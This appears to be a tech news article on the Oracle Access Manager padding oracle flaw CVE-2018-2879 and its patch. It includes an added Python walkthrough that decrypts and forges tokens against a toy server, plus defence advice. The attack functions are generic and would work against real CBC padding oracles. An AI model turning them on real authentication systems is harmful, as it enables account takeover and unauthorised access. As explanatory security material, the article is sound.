

Oracle Access Manager is a terrible doorman: Get patching this bug

Security tool can be gamed to let any old riffraff into data

A security vulnerability in Oracle Access Manager leaves the network authentication tool leaning more toward "access" than "manager."

The flaw, classified as CVE-2018-2879, can be exploited by a remote attacker to bypass an Oracle Access Manager (OAM) authentication screen and, in the process, take over the account of any user or administrator on a vulnerable system.

Designed to manage remote connections to cloud and mobile apps via a single sign-on page, with multi-factor authentication, OAM is offered by Oracle as a part of the security and administration tools for its middleware and PaaS platforms.


According to researcher Wolfgang Ettlinger of SEC Consult Vulnerability Lab, a miscreant can exploit a flaw in the way OAM handles encrypted messages: the server's response reveals whether a tampered ciphertext decrypted to correctly padded data, and that single bit, harvested over many requests, lets an attacker decrypt and forge OAM's encrypted messages without ever learning the key. Specifically, a padding oracle attack ultimately yields a valid authentication cookie for an account of the attacker's choosing.

An attacker exploiting the OAM flaw can script the whole process to generate valid authentication tokens for any desired user, including administrative accounts, and then log in to any OAM-protected resource as that user without knowing a single password. In effect, the attacker takes complete control over everything OAM guards.
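To make the mechanism concrete, here is a worked padding oracle attack against CBC mode with PKCS#7 padding. This is an added example, not code from SEC Consult, Oracle or the original article, and it does not reproduce OAM's message format. The server, its `user=<name>` token layout and its `padding_is_valid` method are constructed for illustration; the leak that matters is that the server answers differently for bad padding than for good padding. A small Feistel block cipher stands in for AES so the example runs with only the Python standard library; the attack code itself never touches the key and works identically against any block cipher in CBC mode.

```python
import hashlib
import os

BLOCK = 16


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


# --- toy block cipher: a 4-round Feistel network with a SHA-256 round function.
# It is a stand-in for AES so the example runs offline; the attack does not depend on it.
def _round(key: bytes, half: bytes, i: int) -> bytes:
    return hashlib.sha256(key + bytes([i]) + half).digest()[:8]


def toy_block_encrypt(key: bytes, block: bytes) -> bytes:
    left, right = block[:8], block[8:]
    for i in range(4):
        left, right = right, xor(left, _round(key, right, i))
    return left + right


def toy_block_decrypt(key: bytes, block: bytes) -> bytes:
    left, right = block[:8], block[8:]
    for i in reversed(range(4)):
        left, right = xor(right, _round(key, left, i)), left
    return left + right


def pad(data: bytes) -> bytes:
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def unpad(data: bytes) -> bytes:
    n = data[-1] if data else 0
    if n < 1 or n > BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]


def cbc_encrypt(key: bytes, iv: bytes, padded: bytes) -> bytes:
    out, prev = b"", iv
    for i in range(0, len(padded), BLOCK):
        prev = toy_block_encrypt(key, xor(padded[i:i + BLOCK], prev))
        out += prev
    return out


def cbc_decrypt(key: bytes, iv: bytes, ct: bytes) -> bytes:
    out, prev = b"", iv
    for i in range(0, len(ct), BLOCK):
        out += xor(toy_block_decrypt(key, ct[i:i + BLOCK]), prev)
        prev = ct[i:i + BLOCK]
    return unpad(out)


class Server:
    """Hypothetical SSO server: issues encrypted tokens of the form IV || CBC(user=<name>)."""

    def __init__(self) -> None:
        self.key = os.urandom(32)  # the attacker never sees this

    def issue_token(self, user: str) -> bytes:
        iv = os.urandom(BLOCK)
        return iv + cbc_encrypt(self.key, iv, pad(f"user={user}".encode()))

    def padding_is_valid(self, token: bytes) -> bool:
        # The bug: a distinguishable answer for bad padding leaks one bit per query.
        try:
            cbc_decrypt(self.key, token[:BLOCK], token[BLOCK:])
            return True
        except ValueError:
            return False

    def whoami(self, token: bytes) -> str:
        return cbc_decrypt(self.key, token[:BLOCK], token[BLOCK:]).decode()


def recover_intermediate(oracle, c: bytes) -> bytes:
    """Recover Dec_k(c) byte by byte, right to left, using only the oracle's yes/no answers."""
    inter = bytearray(BLOCK)
    for pos in range(BLOCK - 1, -1, -1):
        padval = BLOCK - pos  # force the tail to decrypt to padval..padval
        for guess in range(256):
            forged = bytearray(BLOCK)
            forged[pos] = guess
            for j in range(pos + 1, BLOCK):
                forged[j] = inter[j] ^ padval
            if not oracle(bytes(forged) + c):
                continue
            if pos == BLOCK - 1:  # rule out an accidental 0x02 0x02 (or longer) padding match
                forged[pos - 1] ^= 0xFF
                if not oracle(bytes(forged) + c):
                    continue
            inter[pos] = guess ^ padval
            break
        else:
            raise RuntimeError("oracle never accepted a padding; not a padding oracle")
    return bytes(inter)


def oracle_decrypt(oracle, token: bytes) -> bytes:
    """Decrypt a captured token (IV || ciphertext) without the key."""
    blocks = [token[i:i + BLOCK] for i in range(0, len(token), BLOCK)]
    pt = b"".join(xor(recover_intermediate(oracle, blocks[i]), blocks[i - 1])
                  for i in range(1, len(blocks)))
    return unpad(pt)


def oracle_encrypt(oracle, plaintext: bytes) -> bytes:
    """Forge a token for chosen plaintext: pick the last block, work backwards through CBC."""
    padded = pad(plaintext)
    c = os.urandom(BLOCK)
    out = [c]
    for i in range(len(padded) - BLOCK, -1, -BLOCK):
        c = xor(recover_intermediate(oracle, c), padded[i:i + BLOCK])
        out.insert(0, c)  # out[0] ends up as the IV
    return b"".join(out)


def demo() -> tuple:
    server = Server()
    stolen = server.issue_token("alice")  # constructed sample token
    recovered = oracle_decrypt(server.padding_is_valid, stolen)
    forged = oracle_encrypt(server.padding_is_valid, b"user=admin")
    return recovered, server.whoami(forged)
```

Roughly 256 oracle queries per plaintext byte are enough both to read a captured token and, more importantly here, to mint one for `admin`, which mirrors the impact described above: the attacker needs no password and no key. The general defence is to authenticate ciphertexts before decrypting them (an AEAD mode or encrypt-then-MAC) and to reject anything that fails the check with a single, uniform error, so that padding validity is never observable.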

"An attacker can abuse this vulnerability to log in to any resource protected by the OAM using any user account, even administrative accounts," Ettlinger explains.

"This security vulnerability completely breaks the main functionality of the OAM product."

Fortunately, a fix is already available. Ettlinger said his company contacted Oracle about the flaw, and the enterprise software giant shipped a patch for the vulnerability in its April 2018 Critical Patch Update.

As Oracle's patch is the only known way to address the flaw, administrators should make sure the update is applied. Oracle lists versions 11.1.2.3.0 and 12.2.1.3.0 as affected, and unpatched installations of those and earlier releases remain vulnerable. Even so, Ettlinger notes, the fact that the flaw was present at all is not a good sign.

"Since the vulnerability was found in such a central component of the OAM, we suspect that an insufficient amount of attention has been given to information security," Ettlinger notes.

"Given the central position in an organization's security infrastructure, we recommend Oracle's customers either conduct a full audit of the component or request the results of such audits from Oracle." ®
